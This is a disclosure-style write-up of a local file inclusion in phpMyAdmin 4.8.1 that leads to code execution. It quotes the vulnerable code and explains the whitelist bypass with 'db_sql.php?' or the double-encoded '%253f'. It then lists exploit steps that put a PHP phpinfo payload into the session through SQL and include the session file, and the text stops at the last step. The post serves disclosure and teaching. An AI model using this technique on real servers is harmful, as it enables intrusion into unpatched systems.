Author: @Ambulong

Security Team ChaMd5 disclose a Local File Inclusion vulnerability in phpMyAdmin latest version 4.8.1. And the exploiting of this vulnerability may lead to Remote Code Execution. In this article, we will use VulnSpy’s online phpMyAdmin environment to demonstrate the exploit of this vulnerability.

Security Team ChaMd5 disclose a Local File Inclusion vulnerability in phpMyAdmin latest version 4.8.1. And the exploiting of this vulnerability may lead to Remote Code Execution.

In this article, we will use VulnSpy’s online phpMyAdmin environment to demonstrate the exploit of this vulnerability.

VulnSpy’s online phpMyAdmin environment address: http://www.vulnspy.com/phpmyadmin-4.8.1/

Vulnerability Details

1.Line 54-63 in file /index.php:

1 2 3 4 5 6 7 8 9 10 if (! empty ($_REQUEST[ 'target' ]) && is_string($_REQUEST[ 'target' ]) && ! preg_match( '/^index/' , $_REQUEST[ 'target' ]) && ! in_array($_REQUEST[ 'target' ], $target_blacklist) && Core::checkPageValidity($_REQUEST[ 'target' ]) ) { include $_REQUEST[ 'target' ]; exit ; }

2.Core::checkPageValidity in /libraries/classes/Core.php

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 public static function checkPageValidity (&$page, array $whitelist = []) { if ( empty ($whitelist)) { $whitelist = self ::$goto_whitelist; } if (! isset ($page) || !is_string($page)) { return false ; } if (in_array($page, $whitelist)) { return true ; } $_page = mb_substr( $page, 0 , mb_strpos($page . '?' , '?' ) ); if (in_array($_page, $whitelist)) { return true ; } $_page = urldecode($page); $_page = mb_substr( $_page, 0 , mb_strpos($_page . '?' , '?' ) ); if (in_array($_page, $whitelist)) { return true ; } return false ; }

2018-06-25 Update:

Core::checkPageValidity can be bypassed by using by double encoding like %253f .

Core::checkPageValidity can be bypassed by using db_sql.php? .

Thanks for OJ Reeves‘s report, we don’t need to encode ? . Sorry for that mistake.

2018-11-23 Update:

Core::checkPageValidity can be bypassed by using db_sql.php? .

Core::checkPageValidity can be bypassed by using db_sql.php? . In windows, the path contains ‘?’ is considered as a invalid path, Core::checkPageValidity can be bypassed by using by double encoding like %253f . REF:Naming Files, Paths, and Namespaces

Thanks for m3lon‘s report, we need to encode ? in windows.

Exploit

An attacker can use this vulnerability to include session file to lauching a Remote Code Execution vulnerability.

1.Use username root, password toor log into phpmyadmin.

2.Run SQL query

1 select '<?php phpinfo();exit;?>'

3.Get your Session ID

Session ID is the item phpMyAdmin in your cookie.

4.Include the session file